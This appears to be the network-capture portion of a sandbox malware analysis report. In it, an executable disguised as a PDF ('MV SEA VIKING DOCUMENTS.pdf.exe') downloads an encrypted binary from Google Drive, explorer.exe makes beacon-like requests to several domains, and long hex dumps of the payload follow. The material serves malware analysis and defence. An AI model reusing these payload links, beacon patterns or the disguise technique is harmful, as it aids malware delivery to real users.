Date: Mon, 21 Feb 2022 15:51:46 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.quanqiu55555.com/be4o/?h48Hl=yMGLhnyeH19jbN+jTVkumEksJ3u99HITZ4h1J3SKUgKf5+hZ4WRN7xEsij25EKwk4NjG&GXqXh=YZ_XN0
Strict-Transport-Security: max-age=31536000
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              8192.168.11.204978554.154.44.3980C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:51:51.574671030 CET8973OUTGET /be4o/?h48Hl=u3IzMx5ToVDuGGVnzGoQ7VGXCLeqa3ksCgRWKaNdgo4W3sFmKuQ6Eu5/95yvzyZg0zqi&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.mariachinuevozacatecas24-7.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
Feb 21, 2022 16:51:51.609776974 CET  8974                IN         HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:51:51 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 142
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Location: https://www.mariachinuevozacatecas24-7.com/be4o/?h48Hl=u3IzMx5ToVDuGGVnzGoQ7VGXCLeqa3ksCgRWKaNdgo4W3sFmKuQ6Eu5/95yvzyZg0zqi&GXqXh=YZ_XN0
                                                                                                                                                                                                                              Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


Session ID  Source IP      Source Port  Destination IP  Destination Port  Process
9           192.168.11.20  49786        148.251.15.228  80                C:\Windows\explorer.exe
Timestamp                            kBytes transferred  Direction  Data
Feb 21, 2022 16:52:01.821810007 CET  8975                OUT        GET /be4o/?h48Hl=hkcde7P37oUuH8w5ioFv7OuFbHOx9d6tBZcdZbqEWA6Yt+e+JSjrlFDcUKkYXgm22imD&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.antoniopasciuti.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
Feb 21, 2022 16:52:01.836203098 CET  8976                IN         HTTP/1.1 404 Not Found
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:52:01 GMT
                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                              Data Ascii: 826<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html; charset=iso-8859-1" /><title>Error 404 :(</title><style type="text/css">body {margin: 0;padding: 0;font-family: Arial, Helvetica, sans;font-size: 12px;color: #333;}h1 {font-size: 24px;color: #555;margin: 0 0 10px 0;padding: 0;text-align: left;font-weight: normal;}h2 {font-size: 14px;color: #555;font-weight: normal;margin: 0 0 30px 0;padding: 0;}ul {list-style: disc;margin: 0 0 20px 0;}a {font-size: 12px;color: #F7931E;text-decoration: none;}a:hover {text-decoration: underline;}p {margin: 10px 0;}#logo {width: 540px;margin: auto;font-size: 48px;color: #4C5CBD;margin-top: 5%;}#container {width: 540px;margin: auto;border-top: 1px solid #d9d9d9;border-bottom: 1px solid #d9d9d9;padding: 15px0 5px
Feb 21, 2022 16:52:01.836253881 CET  8977                IN
                                                                                                                                                                                                                              Data Ascii: 0;margin-bottom: 10px;}#footer {color: #555;width: 540px;margin: auto;text-align: right;}.orange {color: #FECC04;}</style></head><body onload="start_counter()"><div id="logo">
Feb 21, 2022 16:52:01.836288929 CET  8977                IN         Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


Session ID  Source IP      Source Port  Destination IP   Destination Port  Process
0           192.168.11.20  49756        142.250.185.174  443               C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe
Timestamp                kBytes transferred  Direction  Data
2022-02-21 15:50:16 UTC  0                   OUT        GET /uc?export=download&id=1_L7ZipgVNc4_sHw57wljySn0gUbSqwED HTTP/1.1
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                              Host: drive.google.com
                                                                                                                                                                                                                              Cache-Control: no-cache
2022-02-21 15:50:16 UTC  0                   IN         HTTP/1.1 303 See Other
                                                                                                                                                                                                                              Content-Type: application/binary
                                                                                                                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:50:16 GMT
                                                                                                                                                                                                                              Location: https://doc-04-08-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v3j65rcqup1mp604v6fhecb8kek8r9nu/1645458600000/01502421811266965908/*/1_L7ZipgVNc4_sHw57wljySn0gUbSqwED?e=download
                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                              Content-Security-Policy: script-src 'nonce-Mw8hUujdgzgJeRRN9Xd4Qw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                              Server: ESF
                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                              Connection: close


Session ID  Source IP      Source Port  Destination IP   Destination Port  Process
1           192.168.11.20  49757        142.250.185.161  443               C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe
Timestamp                kBytes transferred  Direction  Data
2022-02-21 15:50:17 UTC  1                   OUT        GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v3j65rcqup1mp604v6fhecb8kek8r9nu/1645458600000/01502421811266965908/*/1_L7ZipgVNc4_sHw57wljySn0gUbSqwED?e=download HTTP/1.1
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Host: doc-04-08-docs.googleusercontent.com
                                                                                                                                                                                                                              Connection: Keep-Alive
2022-02-21 15:50:17 UTC  1                   IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                              X-GUploader-UploadID: ADPycdtO3gmMh9pLVdxkhm-b5GQoSr8EF6szeYfEK9wOFvheqh8CJWWwC7H84ixXc3TuBBdvl1E1-YCjgxR1Uq0XEhY
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              Access-Control-Allow-Credentials: false
                                                                                                                                                                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, 
X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment
                                                                                                                                                                                                                              Access-Control-Allow-Methods: GET,OPTIONS
                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                              Content-Disposition: attachment;filename="bin_uujKagG139.bin";filename*=UTF-8''bin_uujKagG139.bin
                                                                                                                                                                                                                              Content-Length: 167488
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:50:17 GMT
                                                                                                                                                                                                                              Expires: Mon, 21 Feb 2022 15:50:17 GMT
                                                                                                                                                                                                                              Cache-Control: private, max-age=0
                                                                                                                                                                                                                              X-Goog-Hash: crc32c=WR929g==
                                                                                                                                                                                                                              Server: UploadServer
                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Ascii: 46[pEIL'^+jlYn"mPAaV`)/#MuYnRF=+y)Iv`RDutm,f*)}3=gthAi9Sf,wx%LF'*&L,>;Z4Sxse\~R;mP*!<6f/n2K>1^
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC17INData Raw: 59 e1 f4 76 48 d6 9d 7a 55 92 3d 90 94 ee fc a7 c3 a0 75 43 73 c7 86 34 da 48 26 f3 24 10 d5 51 d9 dc 49 7a 70 f5 f5 97 78 a7 dd f7 e0 22 92 ec 51 c2 68 9e ab 90 70 b6 c6 f9 9b a3 f7 c0 a7 f2 d5 22 e7 2a 1d e4 05 69 ed 12 2d 0c 8b 24 5a 44 cc c1 d5 95 a5 05 87 ff 26 a0 92 b7 1d a4 fb e4 7d 5e b6 f9 7a 69 20 da 2e f0 54 b4 16 cd 63 06 72 09 0d 38 46 ff 4c b9 73 d9 5c e8 bf 71 12 47 42 59 4b 9b ea 7d 31 d5 11 ca 07 e9 76 17 ea 7f f9 eb 75 16 87 a4 d4 06 3a 33 5b 09 e9 0c a7 67 af b6 37 9d c2 b1 6f 08 5a d4 83 71 be bc 51 17 6a 60 69 b9 d2 1b 26 de f0 00 ee 39 0f 0a 4a 4f 98 1c 2e c5 c6 99 86 de 93 23 ea 35 13 ca 1f c3 dc 8e c5 7b a8 22 7c 33 3e 28 8c 7b 1e 1f 61 68 58 2b 27 40 3a bc 47 b8 e8 94 bb c0 c0 6b 82 32 11 3f 4f bc d1 06 bd 70 7a 44 aa cf 92 43 bd
                                                                                                                                                                                                                              Data Ascii: YvHzU=uCs4H&$QIzpx"Qhp"*i-$ZD&}^zi .Tcr8FLs\qGBYK}1vu:3[g7oZqQj`i&9JO.#5{"|3>({ahX+'@:Gk2?OpzDC
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC18INData Raw: 23 b9 33 ae 43 0c 57 52 de 23 a5 ab 86 ad ee 30 64 f6 a3 20 22 29 40 ce 53 f6 f3 52 0c a0 48 74 08 5d 37 3a f6 5e e8 cd fd f7 eb 67 bd 5f 75 79 9c 89 48 b0 16 69 8c 76 ff 4e 16 29 d1 9e 12 96 ee f3 d5 80 7b ba 19 c3 ea af ac d7 78 a3 79 71 b0 94 f8 0d 3a 38 3c 45 54 68 d7 fe 6a 9a 92 44 a2 d9 45 51 e8 d0 f7 a9 2a 05 91 2d 4f 65 08 08 05 65 db 4e ba d5 a4 a2 fb 15 2f 3a 6f ff a9 54 5c 1c 36 bd a5 22 bf 10 66 83 c1 5f e2 dd 51 d6 8d 5e f7 94 3a af 7b 61 de cb 44 76 74 ef c5 ca f3 44 30 68 34 af 2f 92 73 9b 62 1e 12 89 a8 12 f6 8e 13 c5 01 23 05 00 98 73 cc ea 82 a5 49 91 b6 68 cd af 35 94 41 6a e2 f8 46 6c e9 0c 37 e8 aa d8 9a 1e 27 bd 36 07 f4 9c 9d de 3a 3b 2b 3e 96 ca 09 93 a9 3b d7 e5 44 77 5a 5c c2 c3 fa 6e af 98 93 c9 59 2b e1 16 1f d9 7c 94 e5 0e 7f
                                                                                                                                                                                                                              Data Ascii: #3CWR#0d ")@SRHt]7:^g_uyHivN){xyq:8<EThjDEQ*-OeeN/:oT\6"f_Q^:{aDvtD0h4/sb#sIh5AjFl7'6:;+>;DwZ\nY+|
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC20INData Raw: 82 bf 09 5a 9c ce c5 52 3c 30 98 9c eb 25 03 f9 90 19 9c 68 c5 06 c1 58 f1 d5 8d 1e d9 73 0c f7 fa f4 7c 69 5c 9e 9a ea 0c b5 83 80 2b a4 93 6f f1 40 4c 79 70 fb 62 3b 94 e6 b0 ac c2 40 0e 46 6f 5f f1 cd e7 58 be e3 0a 05 a4 24 c3 40 44 ac c0 a1 48 ab de 0c f0 bc c9 d6 e8 2c ba 01 a3 8f d8 a5 14 bd ed ff 31 9b 22 2f 61 36 7d 89 2e 4d e4 0d cb 60 33 3d 13 90 20 c6 78 5d 77 f7 e5 84 22 a2 d7 69 78 64 61 01 ea a0 14 94 a2 45 7f 35 38 bf cf 6b d3 34 4c 07 2d 5e bd 38 6f 51 3d 32 7a 79 7c 25 91 ad dc 73 df b5 e7 27 c0 8f e5 a2 68 c7 1e 6c ef 46 dd c7 93 94 79 5e c7 81 30 57 88 17 f9 99 af b8 bf 9e 62 0e 68 79 b5 2b a5 27 32 9c da 19 eb e6 cc 0b 8c c4 d0 9b c2 27 f4 75 32 33 4d 19 31 39 aa f0 d4 0a 35 4c 00 9a b4 c7 61 c3 e2 f9 f0 17 26 85 7c 87 70 c5 f7 15 02
                                                                                                                                                                                                                              Data Ascii: ZR<0%hXs|i\+o@Lypb;@Fo_X$@DH,1"/a6}.M`3= x]w"ixdaE58k4L-^8oQ=2zy|%s'hlFy^0Wbhy+'2'u23M195La&|p
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC21INData Raw: 21 48 ff 11 b5 72 6b bf 0b 62 c9 f7 6d 47 32 1d bb a4 22 fc d1 6d aa 76 ca 7a ce 75 3d 0b 00 4f ec fb 44 55 2c ca a3 48 cb 21 54 0b cb da 17 d1 4d f0 51 38 03 af 3f e3 dd b6 5b 25 48 a5 b2 4e 81 40 e5 d2 96 87 a2 e6 9a 1f 20 94 0b 7c d5 cf 20 78 19 05 57 53 c1 64 ea 28 4b 99 8d 13 cb 40 57 75 3f 13 29 27 24 26 b2 43 0d 11 53 b8 59 fe 24 6a 89 a1 b0 68 bd c8 e4 22 2b 8a b5 77 de 52 a4 b3 75 05 f9 eb 2d fa 3a cc 6b 5d 85 1e 87 f3 3f 6f 10 10 1c 5b df 85 1b 73 f1 84 84 db 19 aa 3c 9d 05 a2 67 b9 b2 95 84 8c 18 31 12 90 7c ad 30 6a 5e bf 31 3b f6 73 99 d2 9e 1e b6 1e 2f 8f 7a 5c 9e 10 0c d8 5d 80 e8 77 29 68 d1 7f 67 2e 31 48 bf 82 3c 4b e2 dd b0 ec 23 ae 55 3d ff d3 4e 9b 2a 8f 88 0c 63 79 04 dc ee b9 f5 56 98 0d f4 0c 40 3c 04 fb e6 29 5e 7f d5 b5 eb 1c 33
                                                                                                                                                                                                                              Data Ascii: !HrkbmG2"mvzu=ODU,H!TMQ8?[%HN@ | xWSd(K@Wu?)'$&CSY$jh"+wRu-:k]?o[s<g1|0j^1;s/z\]w)hg.1H<K#U=N*cyV@<)^3
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC22INData Raw: 50 24 37 31 fa ec 18 e1 da 10 3a 27 df ed 8c 13 1a 39 0a 1a fc c0 10 83 39 7f 1a 0c c5 85 6c 6c e8 0d 17 46 5f b3 b6 8f c5 94 2e ff 18 e5 61 1b 4c ae e8 0e fd 54 22 e8 3d c5 52 e9 cc df 15 c0 df 05 0f 7b 5a bb 5b b9 53 0e e9 c2 46 7f fe 77 f6 57 96 e4 4f 7b d1 7d 2f 60 78 94 6e 8b d8 37 0b 2a c3 91 f4 e9 f2 2f 4e e8 92 84 c5 ea 62 4e 5a b3 b5 f5 a9 32 f2 db 03 6e 43 71 7d 97 8f 5b 42 af 44 bc 12 e6 ce 21 a4 e7 ca ba eb 63 41 ec 66 c4 0f d4 0a 35 3a 97 7e 84 fc 11 4f 8c e5 0b 97 de 81 84 75 b4 f9 4d e2 00 41 b9 8f 3c b7 17 74 b7 73 7e ef a8 33 3a 37 b8 18 e5 e0 83 bd 6f 86 d3 e7 08 c1 ba ce 27 d7 94 bf 1c 89 86 24 ad 7a 5b 49 1b bf 05 d9 62 4b 57 a7 f0 7d 99 eb 03 16 d4 c3 37 5b cb dd fa ca 54 82 35 7f 0f a6 93 76 15 4e 4e d1 53 f1 a1 99 0a ec 98 63 7b e5
                                                                                                                                                                                                                              Data Ascii: P$71:'99llF_.aLT"=R{Z[SFwWO{}/`xn7*/NbNZ2nCq}[BD!cAf5:~OuMA<ts~3:7o'$z[IbKW}7[T5vNNSc{
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC23INData Raw: 68 8b ed 23 cb be 1a 63 7b 47 c5 27 03 bd e0 79 a5 ed 69 e2 15 e5 36 5d a8 59 72 64 87 0d 61 c4 53 66 ca 3b b0 c8 21 2d 1f de 03 29 3e 62 7e 76 ef 83 63 e3 23 f2 2e 37 7d 3e 44 3f 86 0d d8 68 53 d7 c7 df f1 31 f1 f6 82 ce 15 82 9e a6 2f eb bc 05 2b 8b 5d 49 07 fa a5 5b 58 48 e7 af 87 f3 36 a3 8b dd 96 32 e5 5e ac 48 8e 7a d7 dc e8 e3 07 a2 0d 66 72 59 93 44 84 bb 26 3c ce bd 82 93 4f e2 a8 85 ed 23 47 91 a0 3f aa 67 eb 40 e8 26 a4 74 f3 19 48 4b 3b 31 34 13 19 ed e4 2b fd 80 f0 e9 9f f4 fc 65 83 36 dc 4e c5 0e 86 45 32 dc 1d 31 c7 f0 4b 21 87 d2 09 5e 06 04 14 31 78 d3 1e b7 c3 c0 88 83 61 05 72 84 55 68 72 db a3 82 83 d6 58 cf b6 d6 f7 7a b4 cf 28 2a 79 27 f4 94 67 7d c0 f3 5d 3c 9e df 39 dd 33 a4 72 a8 79 21 e2 00 38 6e ad 23 f5 be 24 4f e3 f7 6b 67 49
                                                                                                                                                                                                                              Data Ascii: h#c{G'yi6]YrdaSf;!-)>b~vc#.7}>D?hS1/+]I[XH62^HzfrYD&<O#G?g@&tHK;14+e6NE21K!^1xarUhrXz(*y'g}]<93ry!8n#$OkgI
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC25INData Raw: 64 55 84 90 e5 87 9b bc fa e6 ba 4e e1 ef 4c f9 85 af 38 7e d9 93 d4 8e 22 f2 d9 a2 1d 5d b9 26 62 f3 50 45 af a6 da dd c5 0c cc d3 6c 9e f6 b8 19 9c 2f 42 28 13 9b 47 cf f9 77 df 73 f7 be 75 33 4f a5 47 4b 38 88 3b b0 4b 70 24 23 7e f6 f8 fe b4 e3 1c 33 b2 23 b4 6c 6f 1f 81 8a de 46 42 26 34 3b 37 ef 37 4c 01 ac bd 09 46 97 66 d8 84 46 a8 27 b1 6a cd 88 ec 9c d5 57 85 97 d7 23 61 b6 0e 36 cd 86 a4 79 8c 33 f4 71 bd 74 5c c8 63 37 49 92 ca 38 d0 da ab a2 e5 3e fe 47 4f 4e 5c 9e 8f b6 93 93 3c 7e d2 07 60 c1 ee 3c cc 5a 69 8c d3 bd 0d 28 8c 77 c6 32 48 df 6f 44 9e 38 75 1f 53 46 e8 d8 a5 af 69 5c bc 48 1f bc 06 4f b0 ed e6 ee e3 04 89 49 25 be be 12 49 99 ea ea 1c 9b 34 26 6a 56 48 50 8b 5b a0 7e 68 26 2d 81 00 cc 2b bb 05 b1 a2 f6 de bd 84 e6 05 de a0 ed
                                                                                                                                                                                                                              Data Ascii: dUNL8~"]&bPEl/B(Gwsu3OGK8;Kp$#~3#loFB&4;77LFfF'jW#a6y3qt\c7I8>GON\<~`<Zi(w2HoD8uSFi\HOI%I4&jVHP[~h&-+
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC26INData Raw: dc 0a 01 9d e1 fe 66 0f 1d 2b 95 bf 7b f6 72 ed 65 b3 dd 68 01 de 92 9f 54 69 f7 a4 66 09 e7 8a 49 e5 7b d7 05 6a f5 bd fe 38 91 e2 f5 ba 5b b8 cf 7f 1c a8 1a ad c9 99 85 16 51 54 63 33 a1 22 11 b7 bc 36 e0 8c 17 5d 9f 52 25 00 19 d6 07 ad f3 3e e3 39 3c a2 0f 29 37 ee 5c 39 96 39 a1 a0 3c d5 a2 9b f1 f8 87 5d a0 42 c0 6e 2d 90 96 0a fc 1c bf 7d 57 1c cd b5 a8 d9 15 29 c1 8a fd 4b d5 9d 7a 8e 26 bf d8 54 2d 7f 12 6c 20 28 bf 31 f8 96 30 f9 c3 03 95 a7 1b a1 bd c2 bf d0 af b5 a9 0d dd 0d eb 17 08 e8 a0 b1 43 00 4f fd 7d 0c f7 8b 65 c9 bd d0 a2 f7 c8 1f 5a bb e3 a1 67 30 7b 98 d7 5a 62 af 0f 5b 2b a3 14 cd c1 34 e9 90 54 96 6a a3 16 25 c7 9f b7 6a f3 91 90 50 06 f7 e4 48 12 8d b7 01 69 83 36 a0 a0 95 9e 1a f1 3e 5d 47 b1 ea 0d ae d3 f1 7b 10 e5 81 1c 38 e7
                                                                                                                                                                                                                              Data Ascii: f+{rehTifI{j8[QTc3"6]R%>9<)7\99<]Bn-}W)Kz&T-l (10CO}eZg0{Zb[+4Tj%jPHi6>]G{8
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC27INData Raw: 7b 17 21 a5 6f f4 5d c9 74 7c f8 d5 80 f1 70 ee f0 82 c8 8e 30 d2 6a da 23 18 ab ae e6 6d d6 e3 83 8c 54 9e 11 ae 78 5b e1 1e 05 0f a8 24 4a d4 ee 79 08 31 f4 71 c3 9c 37 82 a5 72 70 a2 ca 54 d0 31 9c 03 ed d6 92 41 28 c7 5d 9f 4c b4 ef a8 e8 08 a3 37 15 2a ec 18 cf 23 38 01 46 45 70 ef 5d 54 d3 9b e3 15 97 4a 61 48 66 8d a6 34 52 e7 31 26 b4 c8 a0 f1 e1 ed 65 15 e7 e1 e6 6d a4 cc 0c 66 d9 b6 f3 9e cc de 14 bb e3 49 d3 52 1f b3 44 0d 67 d1 a0 7e b4 7b 41 06 94 8d ab c1 fb d5 69 6e 8b fe 23 51 af 6e 10 33 9c c1 4a ca f5 8a 1b da 9d 5b b3 ff d7 12 55 27 21 7f 68 bc c1 ef 78 94 45 1a f9 27 a2 fb e6 99 2c 7e 58 34 58 e6 db 33 0e 43 e3 9a 71 5f 0f 6f 44 a2 d9 1a 5e ac db a5 22 fc ab 85 a5 b6 9a f7 84 45 99 84 8d 3f 9a ba b3 09 c4 50 c0 46 4f 4b c2 4e 99 ac 56
                                                                                                                                                                                                                              Data Ascii: {!o]t|p0j#mTx[$Jy1q7rpT1A(]L7*#8FEp]TJaHf4R1&emfIRDg~{Ain#Qn3J[U'!hxE',~X4X3Cq_oD^"E?PFOKNV
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC29INData Raw: 9d 84 6b 39 db 50 e2 69 c6 f0 b2 bc 93 a2 36 57 06 78 53 f1 2e 66 52 ac d9 f8 d3 4a c6 39 eb a7 ac ec 47 70 d7 91 53 d2 d5 97 b7 d6 16 3f d2 45 ed 9c 06 1e 2f c2 58 d5 29 bf b2 b1 1b d7 c4 48 d9 c0 f6 70 f1 40 80 3f b1 23 37 6f 48 f2 9b b7 1c 08 61 fe d9 9a 0c 72 e1 48 5b 81 29 83 a8 5b 23 c5 7e de bb b7 2e 1c c4 74 9e 2a 15 d1 47 91 dd bd c6 92 28 11 68 93 36 e8 19 01 46 b5 6b 9f 1d 6a 88 c4 1a 1a 65 5c 95 26 ff a9 2f 61 8a 48 50 3f e0 b7 f0 54 6a c8 a5 58 38 fc ac fe 7d 7a cd 9e d1 ec a2 7f 07 8d 17 10 f3 c5 f2 11 2a 4d 07 99 76 5b f3 3b 91 2a d5 06 81 2a 3c 47 c1 dd 06 22 2d 0b 2a 67 81 b6 7b 84 b2 d0 ae b3 52 20 3d 16 86 44 90 ec 9a 19 54 46 d2 98 e2 f9 b7 5b 9e bd 45 67 75 65 35 6a 83 57 0d 69 1b 6b 93 93 9c 1b 49 2d 50 fa df 8e 48 1d ce 52 18 cc 6f
                                                                                                                                                                                                                              Data Ascii: k9Pi6WxS.fRJ9GpS?E/X)Hp@?#7oHarH[)[#~.t*G(h6Fkje\&/aHP?TjX8}z*Mv[;**<G"-*g{R =DTF[Egue5jWikI-PHRo
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC30INData Raw: 0e 00 3c cc 8b 74 86 d3 bd 00 95 da f6 7e 8c 50 d1 db d2 bd 24 31 43 5b cb 20 31 6d 70 0c f9 76 b7 e0 66 a3 8e 6e a9 7e 3d 4f db 00 0c d9 6a 96 11 07 21 eb 69 d8 b7 32 b7 28 6a 90 40 67 da 4c 72 e0 28 a9 1b 22 be 70 2a 3c c4 9e b6 1d bb 85 58 88 cf 18 e8 f1 01 71 b6 c4 a4 8d 95 1a a8 1e 96 be 27 61 ed 98 a7 16 ad bf fc 37 c1 cd 87 5b 51 28 0c 8d 14 11 72 58 dc 06 83 d5 b7 50 13 0b ed c0 e0 0b e9 14 92 8b 98 5f 59 25 5a dd 2f fd 4e ea b7 9a 7a 06 35 90 79 72 6e f1 5f 84 05 c4 00 4d dc 3f 51 3f b1 10 6a 14 7c 43 b1 ad 94 14 ca 0f 0a 99 7d d7 dd 3d 07 45 46 94 c0 28 5f 6e 79 0f 7f 42 30 c6 4e ae f3 e4 bf 43 fa dd 0e c7 dd ce f8 76 40 d1 5f 87 96 86 b1 0d 0b b5 e0 13 be ae f8 fb 14 e5 b5 20 50 9f 15 e1 4a 8f a1 c6 50 b1 5b a8 74 a0 df 7b f7 d0 bb a4 b3 7b 44
                                                                                                                                                                                                                              Data Ascii: <t~P$1C[ 1mpvfn~=Oj!i2(j@gLr("p*<Xq'a7[Q(rXP_Y%Z/Nz5yrn_M?Q?j|C}=EF(_nyB0NCv@_ PJP[t{{D
